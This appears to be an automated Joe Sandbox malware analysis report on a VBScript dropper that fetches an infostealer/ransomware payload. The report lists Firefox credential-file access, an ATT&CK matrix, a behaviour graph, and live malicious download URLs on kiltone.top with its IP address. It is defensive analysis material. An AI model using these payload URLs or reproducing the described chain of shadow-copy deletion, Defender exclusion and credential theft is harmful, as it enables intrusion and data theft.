Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\session-state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addons.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526924.bb2f07d2-72ba-475b-89d6-f1004541a20e.new-profile.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532955.5c52a77f-c922-4d05-b4a5-35092432cb64.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\parent.lock
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-wal
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting
Valid Accounts1
Exploitation for Client Execution
221
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
3
File and Directory Discovery
Remote Services1
Archive Collected Data
3
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts3
PowerShell
1
DLL Side-Loading
11
Process Injection
1
Obfuscated Files or Information
LSASS Memory22
System Information Discovery
Remote Desktop Protocol1
Browser Session Hijacking
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt21
Registry Run Keys / Startup Folder
21
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account Manager221
Security Software Discovery
SMB/Windows Admin Shares1
Data from Local System
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
Masquerading
LSA Secrets41
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Modify Registry
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
Virtualization/Sandbox Evasion
DCSync1
Remote System Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Process Injection
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Rundll32
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578028 Sample: NOTIFICATION_OF_DEPENDANTS.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 124 kiltone.top 2->124 144 Antivirus detection for URL or domain 2->144 146 Multi AV Scanner detection for dropped file 2->146 148 Sigma detected: Delete shadow copy via WMIC 2->148 150 11 other signatures 2->150 14 wscript.exe 1 2->14         started        17 eryy65ty.exe 2->17         started        19 eryy65ty.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 dnsIp5 178 VBScript performs obfuscated calls to suspicious functions 14->178 180 Wscript starts Powershell (via cmd or directly) 14->180 182 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->182 186 2 other signatures 14->186 24 cmd.exe 1 14->24         started        26 cmd.exe 1 14->26         started        29 cmd.exe 1 14->29         started        31 powershell.exe 23 14->31         started        184 Deletes shadow drive data (may be related to ransomware) 17->184 33 cmd.exe 17->33         started        35 WMIC.exe 17->35         started        37 WMIC.exe 17->37         started        39 cmd.exe 19->39         started        41 2 other processes 19->41 132 127.0.0.1 unknown unknown 21->132 signatures6 process7 signatures8 49 2 other processes 24->49 168 Suspicious powershell command line found 26->168 170 Wscript starts Powershell (via cmd or directly) 26->170 52 2 other processes 26->52 56 2 other processes 29->56 172 Loading BitLocker PowerShell Module 31->172 174 Powershell drops PE file 31->174 43 conhost.exe 31->43         started        176 Uses ping.exe to sleep 33->176 58 2 other processes 33->58 45 conhost.exe 35->45         started        47 conhost.exe 37->47         started        60 2 other processes 39->60 62 2 other processes 41->62 process9 dnsIp10 140 Suspicious execution chain found 49->140 64 rundll32.exe 49->64         started        130 kiltone.top 45.125.67.168, 443, 49716, 49725 TELE-ASTeleAsiaLimitedHK Hong Kong 52->130 122 C:\Users\user\AppData\Local\...\fjeljies.cpl, PE32 52->122 dropped 66 chrome.exe 20 56->66         started        file11 signatures12 process13 dnsIp14 70 rundll32.exe 64->70         started        126 192.168.2.9, 138, 443, 49704 unknown unknown 66->126 128 239.255.255.250 unknown Reserved 66->128 152 Uses ping.exe to sleep 66->152 73 chrome.exe 66->73         started        signatures15 process16 dnsIp17 166 Adds a directory exclusion to Windows Defender 70->166 76 cmd.exe 70->76         started        78 cmd.exe 70->78         started        81 cmd.exe 70->81         started        134 d12y248af9ueom.cloudfront.net 18.161.69.16, 443, 49712, 49713 MIT-GATEWAYSUS United States 73->134 136 www.google.com 142.250.181.132, 443, 49718, 49728 GOOGLEUS United States 73->136 138 www.oldmutual.co.za 73->138 signatures18 process19 signatures20 83 eryy65ty.exe 76->83         started        87 conhost.exe 76->87         started        188 Suspicious powershell command line found 78->188 190 Wscript starts Powershell (via cmd or directly) 78->190 192 Uses ping.exe to sleep 78->192 194 2 other signatures 78->194 89 powershell.exe 78->89         started        91 conhost.exe 78->91         started        93 powershell.exe 81->93         started        95 conhost.exe 81->95         started        process21 file22 112 C:\Users\user\...\LTKMYBSEYZ.mp3.znWJ (copy), COM 83->112 dropped 114 C:\Users\user\Documents\...\LTKMYBSEYZ.mp3, COM 83->114 dropped 116 C:\Users\user\...\UMMBDNEQBN.xlsx.Qfqe (copy), DOS 83->116 dropped 120 111 other malicious files 83->120 dropped 154 Multi AV Scanner detection for dropped file 83->154 156 Deletes shadow drive data (may be related to ransomware) 83->156 158 May encrypt documents and pictures (Ransomware) 83->158 164 4 other signatures 83->164 97 cmd.exe 83->97         started        100 WMIC.exe 83->100         started        102 WMIC.exe 83->102         started        160 Loading BitLocker PowerShell Module 89->160 162 Powershell drops PE file 89->162 118 C:\Users\user\AppData\Local\...\eryy65ty.exe, PE32 93->118 dropped signatures23 process24 signatures25 142 Uses ping.exe to sleep 97->142 104 conhost.exe 97->104         started        106 PING.EXE 97->106         started        108 conhost.exe 100->108         started        110 conhost.exe 102->110         started        process26

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
NOTIFICATION_OF_DEPENDANTS.vbs3%ReversingLabsWin32.Dropper.Generic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\eryy65ty.exe47%ReversingLabsWin32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\fjeljies.cpl50%ReversingLabsWin32.Infostealer.Tinba
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp0%Avira URL Cloudsafe
https://www.oldmutual.co.za/favicon.ico0%Avira URL Cloudsafe
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4430%Avira URL Cloudsafe
https://kiltone.top/stelin/rwcla.0%Avira URL Cloudsafe
https://kiltone.top/stelin/Gosjeufon.cpl100%Avira URL Cloudmalware
https://kiltone.top/stelin/rwcla.cpl100%Avira URL Cloudmalware
file:///C:/Users/user/Downloads/downloaded.pdf0%Avira URL Cloudsafe
https://www.oldmutual.co.za/v3/assets/blt00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
d12y248af9ueom.cloudfront.net
18.161.69.16
truefalse
    unknown
    www.google.com
    142.250.181.132
    truefalse
      high
      kiltone.top
      45.125.67.168
      truetrue
        unknown
        www.oldmutual.co.za
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdftrue
            unknown
            file:///C:/Users/user/Downloads/downloaded.pdffalse
            • Avira URL Cloud: safe
            unknown
            https://www.oldmutual.co.za/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
            https://kiltone.top/stelin/Gosjeufon.cpltrue
            • Avira URL Cloud: malware
            unknown
            https://kiltone.top/stelin/rwcla.cpltrue
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://www.avito.ru/3870112724rsegmnoittet-es.sqlite.32.drfalse
              high
              https://digify.com/a/#/access/loginrundll32.exe, 00000015.00000002.2161641994.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, fjeljies.cpl.13.drfalse
                high
                https://www.ctrip.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                  high
                  https://www.leboncoin.fr/3870112724rsegmnoittet-es.sqlite.32.drfalse
                    high
                    https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmpcmd.exe, 0000001B.00000002.1770145202.0000000002EC0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://account.bellmedia.c3870112724rsegmnoittet-es.sqlite.32.drfalse
                      high
                      https://weibo.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                        high
                        https://login.microsoftonline.com3870112724rsegmnoittet-es.sqlite.32.drfalse
                          high
                          https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbstrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ifeng.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                            high
                            https://www.zhihu.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                              high
                              http://x1.c.lencr.org/0cert9.db.32.drfalse
                                high
                                http://x1.i.lencr.org/0cert9.db.32.drfalse
                                  high
                                  https://www.msn.com3870112724rsegmnoittet-es.sqlite.32.drfalse
                                    high
                                    https://www.oldmutual.co.za/v3/assets/blt0wscript.exe, wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1573963489.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5places.sqlite.32.drfalse
                                      high
                                      https://www.reddit.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                        high
                                        https://www.amazon.ca/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                          high
                                          https://www.ebay.co.uk/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                            high
                                            https://github.com/mozilla/webcompat-reporterextensions.json.32.drfalse
                                              high
                                              https://www.amazon.co.uk/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                high
                                                https://www.ebay.de/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                  high
                                                  https://screenshots.firefox.com/extensions.json.32.drfalse
                                                    high
                                                    https://www.amazon.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.32.drfalse
                                                        high
                                                        http://crl.ver)svchost.exe, 0000000E.00000002.2703518448.000002794C600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:cert9.db.32.drfalse
                                                            high
                                                            https://www.wykop.pl/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                              high
                                                              https://twitter.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                high
                                                                https://digify.com/a/#/access/logincmdfjeljies.cpl.13.drfalse
                                                                  high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.sqlite.32.drfalse
                                                                    high
                                                                    https://www.olx.pl/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                      high
                                                                      https://www.youtube.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                        high
                                                                        https://allegro.pl/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxfavicons.sqlite.32.drfalse
                                                                            high
                                                                            https://MD8.mozilla.org/1/m3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                              high
                                                                              https://www.bbc.co.uk/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                high
                                                                                https://bugzilla.mo3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                  high
                                                                                  https://g.live.com/odclientsettings/Prod-C:edb.log.14.drfalse
                                                                                    high
                                                                                    https://kiltone.top/stelin/rwcla.wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.amazon.fr/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                      high
                                                                                      https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 0000000E.00000003.1487710421.000002794C810000.00000004.00000800.00020000.00000000.sdmp, edb.log.14.drfalse
                                                                                        high
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.32.drfalse
                                                                                          high
                                                                                          https://www.google.com/complete/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                            high
                                                                                            https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verifieddata.safe.bin.32.drfalse
                                                                                              high
                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgprefs.js.32.drfalse
                                                                                                high
                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiprefs.js.32.drfalse
                                                                                                  high
                                                                                                  https://support.mozilla.orgplaces.sqlite.32.drfalse
                                                                                                    high
                                                                                                    https://www.google.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/search?client=firefox-b-d&q=&data.safe.bin.32.drfalse
                                                                                                        high
                                                                                                        https://www.iqiyi.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                                          high
                                                                                                          https://www.amazon.de/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                                            high
                                                                                                            https://www.baidu.com/3870112724rsegmnoittet-es.sqlite.32.drfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              45.125.67.168
                                                                                                              kiltone.topHong Kong
                                                                                                              133398TELE-ASTeleAsiaLimitedHKtrue
                                                                                                              142.250.181.132
                                                                                                              www.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              18.161.69.16
                                                                                                              d12y248af9ueom.cloudfront.netUnited States
                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                              239.255.255.250
                                                                                                              unknownReserved
                                                                                                              unknownunknownfalse
                                                                                                              IP
                                                                                                              192.168.2.9
                                                                                                              127.0.0.1
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1578028
                                                                                                              Start date and time:2024-12-19 07:51:14 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 8m 43s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:66
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:NOTIFICATION_OF_DEPENDANTS.vbs
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@98/804@7/6
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .vbs
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.162.84, 172.217.17.46, 184.28.90.27, 192.229.221.95, 172.217.17.35, 34.104.35.123, 172.217.19.206, 4.245.163.56
                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: NOTIFICATION_OF_DEPENDANTS.vbs
                                                                                                              TimeTypeDescription
                                                                                                              01:52:17API Interceptor116x Sleep call for process: powershell.exe modified
                                                                                                              01:52:24API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                              01:52:52API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                                              01:52:58API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                                              06:52:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                              06:53:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                              06:53:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              239.255.255.250Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                                https://pdf.ac/4lLzbtGet hashmaliciousUnknownBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                      doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                          vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            http://url8004.msimga.com/ls/click?upn=u001.53NcgwDAAzhzVFiwjkq594MAJWCPhEkQColfld-2B8UTVheZTNvS5XHSLoMFMDMKqB8ozH_SekqilKQ-2BHgXRJqfGhzOp5U5QgEa3j9iCU-2B-2FEmLhcgIb8j4-2F70z5BTR3SsHgk6fUAqo-2B4Hk5qOUpxx5ix21Dz7RacjGAlZQG7X9ZmY-2FMz6G3UEXqPfDFnluOo3vFEWoRVVv0USeiaKWrnmFmXbwzEtxKNaPSY-2FlO1e5ZdfV1YqhnRlOqnd6p2D4F2b2ZE6xQpyHLUek-2FYrpkq3KQVjrFQw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                              https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                                                                https://share.hsforms.com/1IRrYqkWKQoiBbzgMszUPYQsxda8Get hashmaliciousUnknownBrowse
                                                                                                                                  45.125.67.168NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        d12y248af9ueom.cloudfront.netNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 108.158.75.80
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
